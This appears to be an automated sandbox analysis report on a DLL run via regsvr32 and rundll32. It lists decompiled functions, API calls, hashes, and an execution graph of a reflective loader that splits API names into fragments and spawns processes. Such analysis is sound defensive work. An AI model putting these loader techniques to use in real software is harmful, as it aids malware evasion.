                                                                                                        				_t51 = _t61 -  *_t49;
                                                                                                        				if (_t51 - _a32 > 0) goto 0x123d1e5b;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2170(_t51, _a8);
                                                                                                        				_t53 =  *_t51 + _a32;
                                                                                                        				_v40 = _t53;
                                                                                                        				if (_a32 <= 0) goto 0x123d1eef;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC123D22B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x123d1eef;
                                                                                                        				E00007FFC7FFC123D18D0(_t53, _a16);
                                                                                                        				_t54 = _t53 + _a24;
                                                                                                        				_v24 = _t54;
                                                                                                        				E00007FFC7FFC123D18F0(_t54, _a8);
                                                                                                        				_v32 = _t54;
                                                                                                        				E00007FFC7FFC123D2170(_t54, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_v32 +  *_t54, _v24, _a32);
                                                                                                        				return E00007FFC7FFC123D23A0(_v32 +  *_t54, _a8, _v40);
                                                                                                        			}












                                                                                                        0x7ffc123d1df0
                                                                                                        0x7ffc123d1df0
                                                                                                        0x7ffc123d1df5
                                                                                                        0x7ffc123d1dfa
                                                                                                        0x7ffc123d1dff
                                                                                                        0x7ffc123d1e12
                                                                                                        0x7ffc123d1e26
                                                                                                        0x7ffc123d1e2b
                                                                                                        0x7ffc123d1e35
                                                                                                        0x7ffc123d1e3d
                                                                                                        0x7ffc123d1e47
                                                                                                        0x7ffc123d1e4f
                                                                                                        0x7ffc123d1e56
                                                                                                        0x7ffc123d1e60
                                                                                                        0x7ffc123d1e68
                                                                                                        0x7ffc123d1e6d
                                                                                                        0x7ffc123d1e78
                                                                                                        0x7ffc123d1e7a
                                                                                                        0x7ffc123d1e91
                                                                                                        0x7ffc123d1e98
                                                                                                        0x7ffc123d1e9d
                                                                                                        0x7ffc123d1ea2
                                                                                                        0x7ffc123d1eac
                                                                                                        0x7ffc123d1eb1
                                                                                                        0x7ffc123d1ebb
                                                                                                        0x7ffc123d1edb
                                                                                                        0x7ffc123d1ef8

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D21F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D2217
                                                                                                          • Part of subcall function 00007FFC123D2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D217E
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D1E56
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1E98
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1EAC
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D1EDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 3679362534-0
                                                                                                        • Opcode ID: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
                                                                                                        • Instruction ID: 539c1af5c9c79f3473e2f2efef225024557b4b4c8f60c51de5ee25c2dfe5ccb0
                                                                                                        • Opcode Fuzzy Hash: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
                                                                                                        • Instruction Fuzzy Hash: AF21ED3A618F9982DA10DB56E49116EA364FBC4BE0F800075FACD47B6ACEBCD461CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00007FFC7FFC123E1004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
                                                                                                        				intOrPtr _v0;
                                                                                                        				signed long long _v8;
                                                                                                        				void* __rdi;
                                                                                                        				void* __rsi;
                                                                                                        				signed int _t41;
                                                                                                        				signed long long _t62;
                                                                                                        				short* _t67;
                                                                                                        				signed int* _t68;
                                                                                                        				intOrPtr* _t74;
                                                                                                        				intOrPtr* _t76;
                                                                                                        				void* _t84;
                                                                                                        				void* _t88;
                                                                                                        				signed short* _t89;
                                                                                                        				void* _t91;
                                                                                                        				void* _t94;
                                                                                                        				signed short* _t97;
                                                                                                        				void* _t99;
                                                                                                        				void* _t101;
                                                                                                        				void* _t103;
                                                                                                        				void* _t106;
                                                                                                        				void* _t107;
                                                                                                        
                                                                                                        				_t97 = __r8;
                                                                                                        				_t76 = __rcx;
                                                                                                        				_a8 = __rbx;
                                                                                                        				_a24 = __rbp;
                                                                                                        				E00007FFC7FFC123E2DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
                                                                                                        				_t62 =  *0x1244e008; // 0x2d0c2734ea27
                                                                                                        				_a5176 = _t62 ^ _t94 - __rax;
                                                                                                        				_t74 = _t76;
                                                                                                        				r14d = r9d;
                                                                                                        				r10d = r10d & 0x0000003f;
                                                                                                        				_t107 = _t106 + _t97;
                                                                                                        				_t89 = _t97;
                                                                                                        				 *_t74 =  *((intOrPtr*)(0x1244f940 + (__edx >> 6) * 8));
                                                                                                        				 *((intOrPtr*)(_t74 + 8)) = 0;
                                                                                                        				if (_t97 - _t107 >= 0) goto 0x123e1145;
                                                                                                        				_t67 =  &_a40;
                                                                                                        				if (_t89 - _t107 >= 0) goto 0x123e10ae;
                                                                                                        				_t41 =  *_t89 & 0x0000ffff;
                                                                                                        				if (_t41 != 0xa) goto 0x123e109a;
                                                                                                        				 *_t67 = 0xd;
                                                                                                        				_t68 = _t67 + 2;
                                                                                                        				 *_t68 = _t41;
                                                                                                        				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x123e107c;
                                                                                                        				_a16 = _a16 & 0x00000000;
                                                                                                        				_a8 = _a8 & 0x00000000;
                                                                                                        				_v0 = 0xd55;
                                                                                                        				_v8 =  &_a1752;
                                                                                                        				r9d = 0;
                                                                                                        				E00007FFC7FFC123DD698();
                                                                                                        				if (0 == 0) goto 0x123e113d;
                                                                                                        				if (0 == 0) goto 0x123e112d;
                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                        				r8d = 0;
                                                                                                        				r8d = r8d;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x123e113d;
                                                                                                        				if (0 + _a24 < 0) goto 0x123e10fa;
                                                                                                        				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
                                                                                                        				goto 0x123e1071;
                                                                                                        				 *_t74 = GetLastError();
                                                                                                        				return E00007FFC7FFC123D3A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
                                                                                                        			}
























                                                                                                        0x7ffc123e1004
                                                                                                        0x7ffc123e1004
                                                                                                        0x7ffc123e1004
                                                                                                        0x7ffc123e1009
                                                                                                        0x7ffc123e101b
                                                                                                        0x7ffc123e1023
                                                                                                        0x7ffc123e102d
                                                                                                        0x7ffc123e1038
                                                                                                        0x7ffc123e103e
                                                                                                        0x7ffc123e104c
                                                                                                        0x7ffc123e1050
                                                                                                        0x7ffc123e1056
                                                                                                        0x7ffc123e1068
                                                                                                        0x7ffc123e106e
                                                                                                        0x7ffc123e1071
                                                                                                        0x7ffc123e1077
                                                                                                        0x7ffc123e107f
                                                                                                        0x7ffc123e1081
                                                                                                        0x7ffc123e108c
                                                                                                        0x7ffc123e1093
                                                                                                        0x7ffc123e1096
                                                                                                        0x7ffc123e109a
                                                                                                        0x7ffc123e10ac
                                                                                                        0x7ffc123e10ae
                                                                                                        0x7ffc123e10b9
                                                                                                        0x7ffc123e10c7
                                                                                                        0x7ffc123e10da
                                                                                                        0x7ffc123e10df
                                                                                                        0x7ffc123e10e9
                                                                                                        0x7ffc123e10f2
                                                                                                        0x7ffc123e10f8
                                                                                                        0x7ffc123e10fa
                                                                                                        0x7ffc123e110f
                                                                                                        0x7ffc123e1118
                                                                                                        0x7ffc123e1123
                                                                                                        0x7ffc123e112b
                                                                                                        0x7ffc123e1132
                                                                                                        0x7ffc123e1138
                                                                                                        0x7ffc123e1143
                                                                                                        0x7ffc123e1173

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                        • String ID: U
                                                                                                        • API String ID: 442123175-4171548499
                                                                                                        • Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                        • Instruction ID: 5726c5b7c1cee909ec2dafaa6786ab9b98467da45add4589399e4dd95f52781a
                                                                                                        • Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
                                                                                                        • Instruction Fuzzy Hash: 9C41D466B18A9981EB208F25E4443EA77A4FB887A4F814031EE8D87788DF7CD855C750
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123E2EB4(intOrPtr* __rcx) {
                                                                                                        				void* __rbx;
                                                                                                        				void* _t3;
                                                                                                        				void* _t7;
                                                                                                        				void* _t10;
                                                                                                        				void* _t11;
                                                                                                        				void* _t12;
                                                                                                        				void* _t13;
                                                                                                        
                                                                                                        				_t3 = E00007FFC7FFC123D6B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
                                                                                                        				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x123e2ed5;
                                                                                                        				if ( *__rcx != 0xe06d7363) goto 0x123e2ed5;
                                                                                                        				if (_t3 == 1) goto 0x123e2edb;
                                                                                                        				return _t3;
                                                                                                        			}










                                                                                                        0x7ffc123e2ebd
                                                                                                        0x7ffc123e2ec6
                                                                                                        0x7ffc123e2ece
                                                                                                        0x7ffc123e2ed3
                                                                                                        0x7ffc123e2eda

                                                                                                        APIs
                                                                                                        • __C_specific_handler.LIBVCRUNTIME ref: 00007FFC123E2EBD
                                                                                                          • Part of subcall function 00007FFC123D6B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFC123D6C0C
                                                                                                          • Part of subcall function 00007FFC123D6B4C: RtlUnwindEx.KERNEL32 ref: 00007FFC123D6C5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: C_specific_handlerCurrentImageNonwritableUnwind
                                                                                                        • String ID: csm$f
                                                                                                        • API String ID: 1396615161-629598281
                                                                                                        • Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                        • Instruction ID: 73a09a98a31364a6815dc25c746fe83293e1eeabe56b54ac01c176f61382c8a7
                                                                                                        • Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
                                                                                                        • Instruction Fuzzy Hash: 6FD05E5DC0856E8AFB39357110452F805984FDCB34E8884B0CA2804286AF9DA8F4CA21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: P
                                                                                                        • API String ID: 1693014935-3110715001
                                                                                                        • Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                        • Instruction ID: 0ac2d5ee808b6e56fd22d2611d0d23c3fe8ac1162c5b4407188deec4f58bed8e
                                                                                                        • Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
                                                                                                        • Instruction Fuzzy Hash: 0B01AF36519F8486E7608F00F89839AB7B4F788758F600128E6CD46BA8DFBDD568CF44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123D472C(void* __eflags, void* __rax) {
                                                                                                        				char _v40;
                                                                                                        				void* _t6;
                                                                                                        				void* _t11;
                                                                                                        				void* _t12;
                                                                                                        				char* _t14;
                                                                                                        				void* _t16;
                                                                                                        
                                                                                                        				E00007FFC7FFC123D45C0(__rax,  &_v40);
                                                                                                        				_t14 =  &_v40;
                                                                                                        				_t6 = E00007FFC7FFC123D6E00(_t12, _t14, 0x1244cbd8, _t16);
                                                                                                        				asm("int3");
                                                                                                        				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
                                                                                                        				return _t6;
                                                                                                        			}









                                                                                                        0x7ffc123d4735
                                                                                                        0x7ffc123d4741
                                                                                                        0x7ffc123d4746
                                                                                                        0x7ffc123d474b
                                                                                                        0x7ffc123d4758
                                                                                                        0x7ffc123d475d

                                                                                                        APIs
                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFC123D4735
                                                                                                        • _CxxThrowException.LIBVCRUNTIME ref: 00007FFC123D4746
                                                                                                          • Part of subcall function 00007FFC123D6E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC123D472B), ref: 00007FFC123D6E7D
                                                                                                          • Part of subcall function 00007FFC123D6E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFC123D472B), ref: 00007FFC123D6EBC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                        • String ID: Unknown exception
                                                                                                        • API String ID: 3561508498-410509341
                                                                                                        • Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                        • Instruction ID: 02353d74a777d14a4b47f529d78659e2f6995b691d2ec17ca3db08fd6482177a
                                                                                                        • Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
                                                                                                        • Instruction Fuzzy Hash: 61D05E2AA18D9E95EE10EB00E8803E86335FB80718FD04571E24C415B1EFACD66AC760
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:12.3%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:46
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 3055 1e1da4f0000 3058 1e1da4f015a 3055->3058 3056 1e1da4f033f GetNativeSystemInfo 3057 1e1da4f0377 VirtualAlloc 3056->3057 3060 1e1da4f08eb 3056->3060 3063 1e1da4f0395 3057->3063 3058->3056 3058->3060 3059 1e1da4f0873 3059->3060 3061 1e1da4f08c6 RtlAddFunctionTable 3059->3061 3061->3060 3062 1e1da4f084b VirtualProtect 3062->3063 3063->3059 3063->3062 3063->3063 3078 180016464 3081 1800164a2 3078->3081 3080 180016b9d 3081->3080 3082 18000741c 3081->3082 3083 18000745d 3082->3083 3084 1800284b0 CreateProcessW 3083->3084 3085 1800075fe 3084->3085 3085->3080 3064 18000be34 3067 180005db4 3064->3067 3066 18000bf4c 3068 180005df9 3067->3068 3069 1800060dd Process32FirstW 3068->3069 3070 180005e61 3068->3070 3069->3068 3070->3066 3097 180015b18 3099 180015b4c 3097->3099 3098 18000741c CreateProcessW 3098->3099 3099->3098 3100 1800160d6 3099->3100 3086 1800096b8 3087 1800096f2 3086->3087 3088 18000971e 3087->3088 3090 18000be34 3087->3090 3091 180005db4 Process32FirstW 3090->3091 3092 18000bf4c 3091->3092 3092->3087 3101 18001d32c 3102 18001d36d 3101->3102 3103 18001d706 3102->3103 3104 18000be34 Process32FirstW 3102->3104 3104->3102 3071 18000741c 3072 18000745d 3071->3072 3075 1800284b0 3072->3075 3074 1800075fe 3076 180028554 3075->3076 3077 180028653 CreateProcessW 3076->3077 3077->3074 3109 18000f3e0 3112 18000f41e 3109->3112 3110 18000741c CreateProcessW 3111 18000fdb1 3110->3111 3112->3110 3112->3111

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 1e1da4f0000-1e1da4f029a call 1e1da4f091c * 2 13 1e1da4f02a0-1e1da4f02a4 0->13 14 1e1da4f0905 0->14 13->14 15 1e1da4f02aa-1e1da4f02ae 13->15 16 1e1da4f0907-1e1da4f091a 14->16 15->14 17 1e1da4f02b4-1e1da4f02b8 15->17 17->14 18 1e1da4f02be-1e1da4f02c5 17->18 18->14 19 1e1da4f02cb-1e1da4f02dc 18->19 19->14 20 1e1da4f02e2-1e1da4f02eb 19->20 20->14 21 1e1da4f02f1-1e1da4f02fc 20->21 21->14 22 1e1da4f0302-1e1da4f0312 21->22 23 1e1da4f033f-1e1da4f0371 GetNativeSystemInfo 22->23 24 1e1da4f0314-1e1da4f031a 22->24 23->14 26 1e1da4f0377-1e1da4f0393 VirtualAlloc 23->26 25 1e1da4f031c-1e1da4f0324 24->25 27 1e1da4f032c-1e1da4f032d 25->27 28 1e1da4f0326-1e1da4f032a 25->28 29 1e1da4f03aa-1e1da4f03ae 26->29 30 1e1da4f0395-1e1da4f03a8 26->30 33 1e1da4f032f-1e1da4f033d 27->33 28->33 31 1e1da4f03b0-1e1da4f03c2 29->31 32 1e1da4f03dc-1e1da4f03e3 29->32 30->29 35 1e1da4f03d4-1e1da4f03d8 31->35 36 1e1da4f03fb-1e1da4f0417 32->36 37 1e1da4f03e5-1e1da4f03f9 32->37 33->23 33->25 38 1e1da4f03da 35->38 39 1e1da4f03c4-1e1da4f03d1 35->39 40 1e1da4f0419-1e1da4f041a 36->40 41 1e1da4f0458-1e1da4f0465 36->41 37->36 37->37 38->36 39->35 42 1e1da4f041c-1e1da4f0422 40->42 43 1e1da4f046b-1e1da4f0472 41->43 44 1e1da4f0537-1e1da4f0542 41->44 45 1e1da4f0448-1e1da4f0456 42->45 46 1e1da4f0424-1e1da4f0446 42->46 43->44 49 1e1da4f0478-1e1da4f0485 43->49 47 1e1da4f0548-1e1da4f0559 44->47 48 1e1da4f06e6-1e1da4f06ed 44->48 45->41 45->42 46->45 46->46 53 1e1da4f0562-1e1da4f0565 47->53 51 1e1da4f07ac-1e1da4f07c3 48->51 52 1e1da4f06f3-1e1da4f0707 48->52 49->44 50 1e1da4f048b-1e1da4f048f 49->50 54 1e1da4f051b-1e1da4f0525 50->54 59 1e1da4f087a-1e1da4f088d 51->59 60 1e1da4f07c9-1e1da4f07cd 51->60 57 1e1da4f070d 52->57 58 1e1da4f07a9-1e1da4f07aa 52->58 55 1e1da4f055b-1e1da4f055f 53->55 56 1e1da4f0567-1e1da4f0574 53->56 65 1e1da4f052b-1e1da4f0531 54->65 66 1e1da4f0494-1e1da4f04a8 54->66 55->53 61 1e1da4f060d-1e1da4f0619 56->61 62 1e1da4f057a-1e1da4f057d 56->62 63 1e1da4f0712-1e1da4f0736 57->63 58->51 81 1e1da4f088f-1e1da4f089a 59->81 82 1e1da4f08b3-1e1da4f08ba 59->82 64 1e1da4f07d0-1e1da4f07d3 60->64 73 1e1da4f061f 61->73 74 1e1da4f06e2-1e1da4f06e3 61->74 62->61 69 1e1da4f0583-1e1da4f059b 62->69 90 1e1da4f0738-1e1da4f073e 63->90 91 1e1da4f0796-1e1da4f079f 63->91 71 1e1da4f085f-1e1da4f086d 64->71 72 1e1da4f07d9-1e1da4f07e9 64->72 65->44 65->50 67 1e1da4f04cf-1e1da4f04d3 66->67 68 1e1da4f04aa-1e1da4f04cd 66->68 77 1e1da4f04d5-1e1da4f04e1 67->77 78 1e1da4f04e3-1e1da4f04e7 67->78 76 1e1da4f0518-1e1da4f0519 68->76 69->61 79 1e1da4f059d-1e1da4f059e 69->79 71->64 75 1e1da4f0873-1e1da4f0874 71->75 83 1e1da4f080d-1e1da4f080f 72->83 84 1e1da4f07eb-1e1da4f07ed 72->84 85 1e1da4f0625-1e1da4f0648 73->85 74->48 75->59 76->54 86 1e1da4f0511-1e1da4f0515 77->86 88 1e1da4f04fe-1e1da4f0502 78->88 89 1e1da4f04e9-1e1da4f04fc 78->89 87 1e1da4f05a0-1e1da4f0605 79->87 92 1e1da4f08ab-1e1da4f08b1 81->92 95 1e1da4f08bc-1e1da4f08c4 82->95 96 1e1da4f08eb-1e1da4f0903 82->96 97 1e1da4f0822-1e1da4f082b 83->97 98 1e1da4f0811-1e1da4f0820 83->98 93 1e1da4f07ef-1e1da4f07f9 84->93 94 1e1da4f07fb-1e1da4f080b 84->94 111 1e1da4f064a-1e1da4f064b 85->111 112 1e1da4f06b2-1e1da4f06b7 85->112 86->76 87->87 102 1e1da4f0607 87->102 88->76 100 1e1da4f0504-1e1da4f050e 88->100 89->86 103 1e1da4f0740-1e1da4f0746 90->103 104 1e1da4f0748-1e1da4f0754 90->104 91->63 99 1e1da4f07a5-1e1da4f07a6 91->99 92->82 105 1e1da4f089c-1e1da4f08a8 92->105 101 1e1da4f082e-1e1da4f083d 93->101 94->101 95->96 107 1e1da4f08c6-1e1da4f08e9 RtlAddFunctionTable 95->107 96->16 97->101 98->101 99->58 100->86 113 1e1da4f083f-1e1da4f0845 101->113 114 1e1da4f084b-1e1da4f085c VirtualProtect 101->114 102->61 108 1e1da4f077b-1e1da4f078d 103->108 109 1e1da4f0756-1e1da4f0757 104->109 110 1e1da4f0764-1e1da4f0776 104->110 105->92 107->96 108->91 129 1e1da4f078f-1e1da4f0794 108->129 119 1e1da4f0759-1e1da4f0762 109->119 110->108 120 1e1da4f064e-1e1da4f0651 111->120 116 1e1da4f06ce-1e1da4f06d8 112->116 117 1e1da4f06b9-1e1da4f06bd 112->117 113->114 114->71 116->85 122 1e1da4f06de-1e1da4f06df 116->122 117->116 121 1e1da4f06bf-1e1da4f06c3 117->121 119->110 119->119 124 1e1da4f065b-1e1da4f0666 120->124 125 1e1da4f0653-1e1da4f0659 120->125 121->116 128 1e1da4f06c5 121->128 122->74 126 1e1da4f0668-1e1da4f0669 124->126 127 1e1da4f0676-1e1da4f0688 124->127 130 1e1da4f068d-1e1da4f06a3 125->130 131 1e1da4f066b-1e1da4f0674 126->131 127->130 128->116 129->90 133 1e1da4f06ac 130->133 134 1e1da4f06a5-1e1da4f06aa 130->134 131->127 131->131 133->112 134->120
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.273210365.000001E1DA4F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E1DA4F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_1e1da4f0000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
                                                                                                        • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                        • API String ID: 998211078-3605381585
                                                                                                        • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction ID: 57a7e38ab9bffc3e85de6423bd8cfb181a31742caee6b0426427f55cc09e7569
                                                                                                        • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                        • Instruction Fuzzy Hash: DA62D232618A489BD719DF58CC897AEB3E5FBC4304F14562DE88AC7251EB34E542CB86
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 385 1800284b0-18002857e call 180011408 388 180028653-18002868d CreateProcessW 385->388 389 180028584-18002864d call 18000f174 385->389 389->388
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.272245824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
